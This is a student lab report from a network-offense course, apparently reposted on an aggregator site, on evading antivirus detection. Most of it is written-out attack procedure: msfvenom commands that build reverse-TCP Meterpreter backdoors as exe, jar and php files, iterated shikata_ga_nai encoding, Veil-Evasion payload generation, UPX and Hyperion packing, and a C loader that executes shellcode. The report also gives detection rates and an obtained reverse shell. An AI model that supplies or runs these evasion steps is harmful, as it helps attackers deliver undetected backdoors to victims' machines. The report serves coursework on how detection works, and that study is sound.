2019-2020-2 网络对抗技术 20175311胡济栋 Exp3 免杀原理与实践

Posted hujidong42

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2019-2020-2 网络对抗技术 20175311胡济栋 Exp3 免杀原理与实践相关的知识,希望对你有一定的参考价值。

2019-2020-2 网络对抗技术 20175311胡济栋 Exp3 免杀原理与实践

目录

  • 一、实验介绍

  • 二、实验内容

    • 任务一:学习正确使用msf编码器、msfvenom生成如jar之类的其他文件、veil、加壳工具、 使用C + shellcode编程以及课堂其他课堂为介绍方法(3分)
    • 任务二:通过组合应用各种技术实现恶意代码免杀(0.5分)
    • 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(0.5分)
  • 三、实验要求

  • 四、实验感想

一、实验介绍

1.免杀原理

  • 免杀技术,全称为反杀毒技术(Anti Anti-Virus),是指对恶意软件的处理让其能够不被杀毒软件所检测,同时也是渗透测试中需要使用到的技术。
  • 学习免杀就必须了解恶意软件检测工具是如何运作的,知己知彼,百战百胜。

2.恶意软件检测机制

基于特征码的检测

  • 简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。
  • AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。

启发式恶意软件检测

  • 启发式Heuristic,简单来说,就是根据些片面特征去推断,通常是因为缺乏精确判定依据。
  • 对恶意软件检测来主说,就是如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,那我们就把它当成一个恶意软件。典型的行为如连接恶意网站、开放端口、修改系统文件,典型的“外观”如文件本身签名、结构、厂商等信息等。各个厂商会定义自己的检测模式。
  • 优点:可以检测0-day恶意软件、具有一定通用性
  • 缺点:实时监控系统行为,开销稍多;没有居于特征码的精确度高

基于行为的恶意软件检测

  • 可以理解为加入了行为监控的启发式。通过对恶意代码的观察研究,发现有一些行为是恶意代码共同的比较特殊的行为,杀软会监视程序的运行,如果发现了这些特殊行为,就会认为其是恶意软件。

3.免杀技术综述

  • 改变特征码的技术:加壳、使用encode进行编码、基于payload重新编译生成可执行文件、使用其他语言重写再编译
  • 改变行为的技术: 尽量使用反弹式连接,使用隧道技术,加密通讯数据;基于内存操作,减少对系统修改,加入混淆作用的正常功能代码
  • 非常规技术:使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中;使用社工类攻击,诱骗目标关闭AV软件;纯手工制作恶意软件

二、实验内容

任务一:学习正确使用msf编码器、msfvenom生成如jar之类的其他文件、veil、加壳工具、 使用C + shellcode编程以及课堂其他课堂为介绍方法

1.正确使用msf编码器,生成exe文件

  • 实验二中我们利用msf生成过后门程序backdoor.exe,利用VirusTotalVirscan两个网站进行恶意软件检测。

  • 使用VirusTotal的检测结果如下:
    技术图片

  • 使用Virscan的检测结果如下:
    技术图片

  • 由此可见直接生成的exe文件能够被绝大多数杀毒软件识别,免杀性较低

  • 一次编码使用指令:-e选择编码器,-b是payload中需要去除的字符,该命令中为了使‘x00‘不出现在shellcode中,因为shellcode以‘x00‘为结束符。

  • 在命令行输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00‘ LHOST=192.168.40.132 LPORT=5311 -f exe > 5311msf.exe

  • 注意,结果奚晨妍同学的提醒,这里的引号需要用英文引号而不是中文的,老师给出的是中文所以运行出来是产生不了正确的exe文件,下图为对比图。
    技术图片
    技术图片

  • 十次编码使用命令:i设置迭代次数,msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00‘ LHOST=192.168.40.132 LPORT=5311 -f exe > 5311msf.exe
    技术图片
    技术图片

  • shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中,杀软只要盯住这部分就可以了。

  • msfvenom会以固定的模板生成exe,所有它生成的exe,如果使用默认参数或模板,也有一定的固定特征。所以一般来说AV厂商会针对其使用的模板来生成特征码,这样就一劳永逸地解决所有msfvenom生成的恶意代码了。那如果使用msfvenom免杀,就要使用原生的模板。

2.msfvenom生成jar文件

  • 生成java后门程序,在命令行输入msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.40.132 LPORT=5311 x> sxx_backdoor_java.jar
    技术图片
  • 网站中扫描结果如下,有差不多一半的杀毒软件可以识别
    技术图片

3.msfvenom生成php文件

  • 生成PHP后门程序,在命令行输入msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.40.132 LPORT=5311 x> 20175311_backdoor.php,稍等片刻即可生成文件
    技术图片
  • 网站中扫描结果如下,仅有3家杀毒软件可以识别
    技术图片

4. 使用veil-evasion生成后门程序及检测

  • 安装veil,按照学长学姐给出的教程来按照
  • 在命令行输入指令
mkdir -p ~/.cache/wine
cd ~/.cache/wine 
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

技术图片

  • 输入sudo apt-get install veil-evasion进行安装veil
    技术图片
  • 输入veil打开veil,然后一直输入y直到安装成功,然后就是漫长的等待
  • 如果热点流量够的话,可以使用热点,速度加倍~
    技术图片
  • 如果出现了安装完成后,输入veil指令依然无法打开,可以尝试卸载后重新安装。输入sudo apt-get purge veil卸载veil,然后重新安装‘sudo apt-get install veil‘
  • 如果出现下图这种问题,显示ERROR找不到相应文件,则可以执行命令后面的建议。比如说这里可以执行/usr/share/veil/config/setup.sh --force --silent
    技术图片
  • 当你看到出现这句话和这样的界面就证明安装成功了。历尽千险,我终终终终终于安装成功了!!!!
    技术图片
  • 输入use evasion命令进入Evil-Evasion
    技术图片
  • 输入use c/meterpreter/rev_tcp.py进入配置界面
    技术图片
  • 设置反弹连接IP,地址为kali的IP地址set LHOST 192.168.40.132;设置端口号set LPORT 5311
    技术图片
  • 输入generate生成文件,并且输入名称veil_c_5311
    技术图片
  • 网站检测结果,有26%的杀毒软件可以检测
    技术图片

4.使用加壳工具尝试

加壳,全称是可执行程序资源压缩,对相应的资源进行压缩,压缩后仍可运行。它可以用来保护版权,但同时许多病毒也利用它来作为原理。接下来将使用压缩壳和保密壳来进行试验。

  • 使用压缩壳upx,输入upx 5311msf.exe -o sxx_upxed.exe得到加壳文件
    技术图片

  • 网站检测结果,有44%的杀毒软件可以检测
    技术图片

  • 将电脑的杀毒软件关掉,开始进行kali访问本机电脑主机,进行反弹连接,输入相关参数

  • 可以看到kali成功获取到了我电脑本机的桌面清单
    技术图片

  • 使用加密壳Hyperion,将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中

  • 输入命令wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe进行加壳
    技术图片
    技术图片

  • 同理进行反弹连接
    技术图片
    技术图片
    技术图片

  • 网站扫描结果如下:
    技术图片

5.使用C+shellcode编程

  • 首先输入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.132 LPORT=5311 -f c用c语言生成了一段shellcode
    技术图片
  • 创建一个文件,将char buf中的数据赋值其中,代码如下:
unsigned char buf[] = 
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
此处省略
"xc3xbbxf0xb5xa2x56x6ax00x53xffxd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

技术图片

  • 输入i686-w64-mingw32-g++ 20175311.c -o 20175311.exe编译成为可执行文件
    技术图片
  • 网站扫描结果如下:
    技术图片

三、实验要求

四、实验感想

  • 我在实验刚刚起步的任务一就遇到了问题,kali中输入msfconsole后就报错,如下图。查询百度发现是编码的问题,于是重新安装了msf,并且更新相关文件。
    技术图片
    技术图片

以上是关于2019-2020-2 网络对抗技术 20175311胡济栋 Exp3 免杀原理与实践的主要内容,如果未能解决你的问题,请参考以下文章

2019-2020-2 20175216 《网络对抗技术》Exp7 网络欺诈防范

2019-2020-2 20175216 《网络对抗技术》Exp7 网络欺诈防范

2019-2020-2 20175303柴轩达《网络对抗技术》Exp4 恶意代码分析

2019-2020-2 网络对抗技术 20175209 Exp7 网络欺诈防范

2019-2020-2 网络对抗技术 20175214 Exp7 网络欺诈防范

2019-2020-2 网络对抗技术 20175214 Exp7 网络欺诈防范